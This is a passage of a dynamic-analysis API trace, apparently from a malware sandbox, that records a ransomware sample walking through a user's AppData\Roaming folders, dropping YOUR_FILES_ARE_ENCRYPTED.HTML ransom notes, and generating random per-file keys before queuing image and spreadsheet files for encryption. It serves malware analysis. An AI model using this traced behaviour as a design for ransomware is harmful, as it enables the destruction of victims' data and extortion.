wsprintfW (in: param_1=0x19e9f6, param_2="%02X" | out: param_1="65") returned 2 [0122.578] wsprintfW (in: param_1=0x19e9fa, param_2="%02X" | out: param_1="C8") returned 2 [0122.578] wsprintfW (in: param_1=0x19e9fe, param_2="%02X" | out: param_1="DB") returned 2 [0122.578] wsprintfW (in: param_1=0x19ea02, param_2="%02X" | out: param_1="AD") returned 2 [0122.578] wsprintfW (in: param_1=0x19ea06, param_2="%02X" | out: param_1="39") returned 2 [0122.578] wsprintfW (in: param_1=0x19ea0a, param_2="%02X" | out: param_1="E2") returned 2 [0122.578] wsprintfW (in: param_1=0x19ea0e, param_2="%02X" | out: param_1="9E") returned 2 [0122.578] wsprintfW (in: param_1=0x19ea12, param_2="%02X" | out: param_1="32") returned 2 [0122.578] wsprintfW (in: param_1=0x19ea16, param_2="%02X" | out: param_1="9D") returned 2 [0122.578] wsprintfW (in: param_1=0x19ea1a, param_2="%02X" | out: param_1="5C") returned 2 [0122.578] wsprintfW (in: param_1=0x19ea1e, param_2="%02X" | out: param_1="BD") returned 2 [0122.578] wsprintfW (in: param_1=0x19ea22, param_2="%02X" | out: param_1="D7") returned 2 [0122.578] wsprintfW (in: param_1=0x19ea26, param_2="%02X" | out: param_1="27") returned 2 [0122.578] wsprintfW (in: param_1=0x19ea2a, param_2="%02X" | out: param_1="7E") returned 2 [0122.578] wsprintfW (in: param_1=0x19ea2e, param_2="%02X" | out: param_1="1C") returned 2 [0122.578] wsprintfW (in: param_1=0x19ea32, param_2="%02X" | out: param_1="65") returned 2 [0122.578] wsprintfW (in: param_1=0x19ea36, param_2="%02X" | out: param_1="FA") returned 2 [0122.578] wsprintfW (in: param_1=0x19ea3a, param_2="%02X" | out: param_1="14") returned 2 [0122.578] wsprintfW (in: param_1=0x19ea3e, param_2="%02X" | out: param_1="DA") returned 2 [0122.578] wsprintfW (in: param_1=0x19ea42, param_2="%02X" | out: param_1="52") returned 2 [0122.578] wsprintfW (in: param_1=0x19ea46, param_2="%02X" | out: param_1="08") returned 2 [0122.578] wsprintfW (in: param_1=0x19ea4a, param_2="%02X" | out: param_1="52") returned 2 [0122.578] wsprintfW (in: param_1=0x19ea4e, param_2="%02X" | out: param_1="37") returned 2 [0122.578] wsprintfW (in: param_1=0x19ea52, param_2="%02X" | out: param_1="17") returned 2 [0122.578] wsprintfW (in: param_1=0x19ea56, param_2="%02X" | out: param_1="76") returned 2 [0122.578] wsprintfW (in: param_1=0x19ea5a, param_2="%02X" | out: param_1="F8") returned 2 [0122.578] wsprintfW (in: param_1=0x19ea5e, param_2="%02X" | out: param_1="00") returned 2 [0122.578] wsprintfW (in: param_1=0x19ea62, param_2="%02X" | out: param_1="00") returned 2 [0122.579] lstrcpyW (in: lpString1=0x32d9114, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\6oJyejxtw_dKmNa.m4a" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\6oJyejxtw_dKmNa.m4a") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\6oJyejxtw_dKmNa.m4a" [0122.579] CreateIoCompletionPort (FileHandle=0x320, ExistingCompletionPort=0x274, CompletionKey=0x32c9060, NumberOfConcurrentThreads=0x0) returned 0x274 [0122.579] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x32c9060, lpOverlapped=0x32c9060) returned 1 [0122.579] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42a37b71, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42a37b71, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42a37b71, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x6265c0, cFileName="Adobe", cAlternateFileName="")) returned 1 [0122.579] StrStrIW (lpFirst="Adobe", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0122.579] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Adobe") returned 47 [0122.580] GetProcessHeap () returned 0x600000 [0122.580] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0122.581] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Adobe" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Adobe") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Adobe" [0122.581] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Adobe", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Adobe\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Adobe\\*" [0122.581] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Adobe\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42a37b71, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42a37b71, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42a37b71, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0xfcfdef2f, cFileName=".", cAlternateFileName="")) returned 0x626838 [0122.650] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42a37b71, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42a37b71, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42a37b71, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0xfcfdef2f, cFileName="..", cAlternateFileName="")) returned 1 [0122.650] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42a37b71, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42a37b71, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42a37b71, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0xfcfdef2f, cFileName="Flash Player", cAlternateFileName="FLASHP~1")) returned 1 [0122.650] StrStrIW (lpFirst="Flash Player", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0122.651] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Adobe\\Flash Player") returned 60 [0122.651] GetProcessHeap () returned 0x600000 [0122.651] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3106fd8 [0122.652] lstrcpyW (in: lpString1=0x3106fd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Adobe\\Flash Player" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Adobe\\Flash Player") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Adobe\\Flash Player" [0122.652] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Adobe\\Flash Player", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Adobe\\Flash Player\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Adobe\\Flash Player\\*" [0122.652] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Adobe\\Flash Player\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42a37b71, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42a37b71, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42a37b71, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63dde0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0122.667] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42a37b71, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42a37b71, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42a37b71, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63dde0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0122.667] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42a37b71, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42a37b71, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42a37b71, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63dde0, dwReserved1=0x0, cFileName="NativeCache", cAlternateFileName="NATIVE~1")) returned 1 [0122.667] StrStrIW (lpFirst="NativeCache", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0122.667] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache") returned 72 [0122.667] GetProcessHeap () returned 0x600000 [0122.667] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6b47b0 [0122.669] lstrcpyW (in: lpString1=0x6b47b0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache" [0122.669] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache\\*" [0122.669] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42a37b71, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42a37b71, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42a37b71, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f4692, dwReserved1=0x6f4618, cFileName=".", cAlternateFileName="")) returned 0x6268f8 [0122.670] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42a37b71, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42a37b71, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42a37b71, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f4692, dwReserved1=0x6f4618, cFileName="..", cAlternateFileName="")) returned 1 [0122.670] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42a37b71, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42a37b71, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42a37b71, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f4692, dwReserved1=0x6f4618, cFileName="..", cAlternateFileName="")) returned 0 [0122.670] FindClose (in: hFindFile=0x6268f8 | out: hFindFile=0x6268f8) returned 1 [0122.670] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 102 [0122.670] GetProcessHeap () returned 0x600000 [0122.670] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0122.671] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\adobe\\flash player\\nativecache\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0122.672] WriteFile (in: hFile=0x324, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0122.673] CloseHandle (hObject=0x324) returned 1 [0122.674] GetProcessHeap () returned 0x600000 [0122.674] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0122.674] GetProcessHeap () returned 0x600000 [0122.674] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6b47b0 | out: hHeap=0x600000) returned 1 [0122.674] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42a37b71, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42a37b71, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42a37b71, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63dde0, dwReserved1=0x0, cFileName="NativeCache", cAlternateFileName="NATIVE~1")) returned 0 [0122.674] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0122.674] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Adobe\\Flash Player\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 90 [0122.674] GetProcessHeap () returned 0x600000 [0122.674] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0122.674] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Adobe\\Flash Player\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\adobe\\flash player\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0122.678] WriteFile (in: hFile=0x32c, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e7a4*=0x3c00, lpOverlapped=0x0) returned 1 [0122.679] CloseHandle (hObject=0x32c) returned 1 [0122.679] GetProcessHeap () returned 0x600000 [0122.679] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0122.679] GetProcessHeap () returned 0x600000 [0122.680] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3106fd8 | out: hHeap=0x600000) returned 1 [0122.777] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42a37b71, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42a37b71, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42a37b71, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0xfcfdef2f, cFileName="Flash Player", cAlternateFileName="FLASHP~1")) returned 0 [0122.778] FindClose (in: hFindFile=0x626838 | out: hFindFile=0x626838) returned 1 [0122.778] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Adobe\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 77 [0122.778] GetProcessHeap () returned 0x600000 [0122.778] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3153030 [0122.779] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Adobe\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\adobe\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0122.780] WriteFile (in: hFile=0x320, lpBuffer=0x3153030*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19eab8, lpOverlapped=0x0 | out: lpBuffer=0x3153030*, lpNumberOfBytesWritten=0x19eab8*=0x3c00, lpOverlapped=0x0) returned 1 [0122.782] CloseHandle (hObject=0x320) returned 1 [0122.782] GetProcessHeap () returned 0x600000 [0122.782] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3153030 | out: hHeap=0x600000) returned 1 [0122.782] GetProcessHeap () returned 0x600000 [0122.782] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0122.783] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f27cb40, ftCreationTime.dwHighDateTime=0x1d6fbc7, ftLastAccessTime.dwLowDateTime=0xdba33380, ftLastAccessTime.dwHighDateTime=0x1d7080a, ftLastWriteTime.dwLowDateTime=0xdba33380, ftLastWriteTime.dwHighDateTime=0x1d7080a, nFileSizeHigh=0x0, nFileSizeLow=0x108c2, dwReserved0=0xa0000003, dwReserved1=0x6265c0, cFileName="AG haIVxOY4iH21cyJ.jpg", cAlternateFileName="AGHAIV~1.JPG")) returned 1 [0122.783] StrStrIW (lpFirst="AG haIVxOY4iH21cyJ.jpg", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0122.783] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\AG haIVxOY4iH21cyJ.jpg") returned 64 [0122.783] PathFindExtensionW (pszPath="AG haIVxOY4iH21cyJ.jpg") returned=".jpg" [0122.783] lstrlenW (lpString=".jpg") returned 4 [0122.783] PathFindExtensionW (pszPath="AG haIVxOY4iH21cyJ.jpg") returned=".jpg" [0122.783] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0122.783] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\AG haIVxOY4iH21cyJ.jpg" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\ag haivxoy4ih21cyj.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x320 [0122.785] GetFileSizeEx (in: hFile=0x320, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=67778) returned 1 [0122.785] GetProcessHeap () returned 0x600000 [0122.785] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3340008 [0122.788] wsprintfW (in: param_1=0x19e9e6, param_2="%02X" | out: param_1="AF") returned 2 [0122.788] wsprintfW (in: param_1=0x19e9ea, param_2="%02X" | out: param_1="A5") returned 2 [0122.788] wsprintfW (in: param_1=0x19e9ee, param_2="%02X" | out: param_1="06") returned 2 [0122.788] wsprintfW (in: param_1=0x19e9f2, param_2="%02X" | out: param_1="EA") returned 2 [0122.788] wsprintfW (in: param_1=0x19e9f6, param_2="%02X" | out: param_1="BB") returned 2 [0122.788] wsprintfW (in: param_1=0x19e9fa, param_2="%02X" | out: param_1="F7") returned 2 [0122.788] wsprintfW (in: param_1=0x19e9fe, param_2="%02X" | out: param_1="35") returned 2 [0122.788] wsprintfW (in: param_1=0x19ea02, param_2="%02X" | out: param_1="B5") returned 2 [0122.788] wsprintfW (in: param_1=0x19ea06, param_2="%02X" | out: param_1="A0") returned 2 [0122.788] wsprintfW (in: param_1=0x19ea0a, param_2="%02X" | out: param_1="8B") returned 2 [0122.788] wsprintfW (in: param_1=0x19ea0e, param_2="%02X" | out: param_1="F6") returned 2 [0122.788] wsprintfW (in: param_1=0x19ea12, param_2="%02X" | out: param_1="48") returned 2 [0122.788] wsprintfW (in: param_1=0x19ea16, param_2="%02X" | out: param_1="21") returned 2 [0122.788] wsprintfW (in: param_1=0x19ea1a, param_2="%02X" | out: param_1="4A") returned 2 [0122.788] wsprintfW (in: param_1=0x19ea1e, param_2="%02X" | out: param_1="CE") returned 2 [0122.788] wsprintfW (in: param_1=0x19ea22, param_2="%02X" | out: param_1="E4") returned 2 [0122.788] wsprintfW (in: param_1=0x19ea26, param_2="%02X" | out: param_1="91") returned 2 [0122.788] wsprintfW (in: param_1=0x19ea2a, param_2="%02X" | out: param_1="9C") returned 2 [0122.789] wsprintfW (in: param_1=0x19ea2e, param_2="%02X" | out: param_1="80") returned 2 [0122.789] wsprintfW (in: param_1=0x19ea32, param_2="%02X" | out: param_1="7B") returned 2 [0122.789] wsprintfW (in: param_1=0x19ea36, param_2="%02X" | out: param_1="ED") returned 2 [0122.789] wsprintfW (in: param_1=0x19ea3a, param_2="%02X" | out: param_1="F2") returned 2 [0122.789] wsprintfW (in: param_1=0x19ea3e, param_2="%02X" | out: param_1="DF") returned 2 [0122.789] wsprintfW (in: param_1=0x19ea42, param_2="%02X" | out: param_1="6B") returned 2 [0122.789] wsprintfW (in: param_1=0x19ea46, param_2="%02X" | out: param_1="88") returned 2 [0122.789] wsprintfW (in: param_1=0x19ea4a, param_2="%02X" | out: param_1="9A") returned 2 [0122.789] wsprintfW (in: param_1=0x19ea4e, param_2="%02X" | out: param_1="A6") returned 2 [0122.789] wsprintfW (in: param_1=0x19ea52, param_2="%02X" | out: param_1="AE") returned 2 [0122.789] wsprintfW (in: param_1=0x19ea56, param_2="%02X" | out: param_1="C1") returned 2 [0122.789] wsprintfW (in: param_1=0x19ea5a, param_2="%02X" | out: param_1="06") returned 2 [0122.789] wsprintfW (in: param_1=0x19ea5e, param_2="%02X" | out: param_1="DD") returned 2 [0122.789] wsprintfW (in: param_1=0x19ea62, param_2="%02X" | out: param_1="4E") returned 2 [0122.790] lstrcpyW (in: lpString1=0x33500bc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\AG haIVxOY4iH21cyJ.jpg" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\AG haIVxOY4iH21cyJ.jpg") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\AG haIVxOY4iH21cyJ.jpg" [0122.790] CreateIoCompletionPort (FileHandle=0x320, ExistingCompletionPort=0x274, CompletionKey=0x3340008, NumberOfConcurrentThreads=0x0) returned 0x274 [0122.790] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3340008, lpOverlapped=0x3340008) returned 1 [0122.790] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x864c1900, ftCreationTime.dwHighDateTime=0x1d70040, ftLastAccessTime.dwLowDateTime=0x9634d840, ftLastAccessTime.dwHighDateTime=0x1d7068d, ftLastWriteTime.dwLowDateTime=0x9634d840, ftLastWriteTime.dwHighDateTime=0x1d7068d, nFileSizeHigh=0x0, nFileSizeLow=0x59f8, dwReserved0=0xa0000003, dwReserved1=0x6265c0, cFileName="Cs93xcG-R.ods", cAlternateFileName="CS93XC~1.ODS")) returned 1 [0122.790] StrStrIW (lpFirst="Cs93xcG-R.ods", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0122.790] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Cs93xcG-R.ods") returned 55 [0122.790] PathFindExtensionW (pszPath="Cs93xcG-R.ods") returned=".ods" [0122.790] lstrlenW (lpString=".ods") returned 4 [0122.790] PathFindExtensionW (pszPath="Cs93xcG-R.ods") returned=".ods" [0122.790] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0122.790] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Cs93xcG-R.ods" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\cs93xcg-r.ods"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x308 [0122.792] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=23032) returned 1 [0122.792] GetProcessHeap () returned 0x600000 [0122.792] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x670340 [0122.795] wsprintfW (in: param_1=0x19e9e6, param_2="%02X" | out: param_1="36") returned 2 [0122.795] wsprintfW (in: param_1=0x19e9ea, param_2="%02X" | out: param_1="95") returned 2 [0122.795] wsprintfW (in: param_1=0x19e9ee, param_2="%02X" | out: param_1="81") returned 2 [0122.796] wsprintfW (in: param_1=0x19e9f2, param_2="%02X" | out: param_1="6B") returned 2 [0122.796] wsprintfW (in: param_1=0x19e9f6, param_2="%02X" | out: param_1="37") returned 2 [0122.796] wsprintfW (in: param_1=0x19e9fa, param_2="%02X" | out: param_1="A3") returned 2 [0122.796] wsprintfW (in: param_1=0x19e9fe, param_2="%02X" | out: param_1="E6") returned 2 [0122.796] wsprintfW (in: param_1=0x19ea02, param_2="%02X" | out: param_1="69") returned 2 [0122.796] wsprintfW (in: param_1=0x19ea06, param_2="%02X" | out: param_1="4E") returned 2 [0122.796] wsprintfW (in: param_1=0x19ea0a, param_2="%02X" | out: param_1="A9") returned 2 [0122.796] wsprintfW (in: param_1=0x19ea0e, param_2="%02X" | out: param_1="90") returned 2 [0122.796] wsprintfW (in: 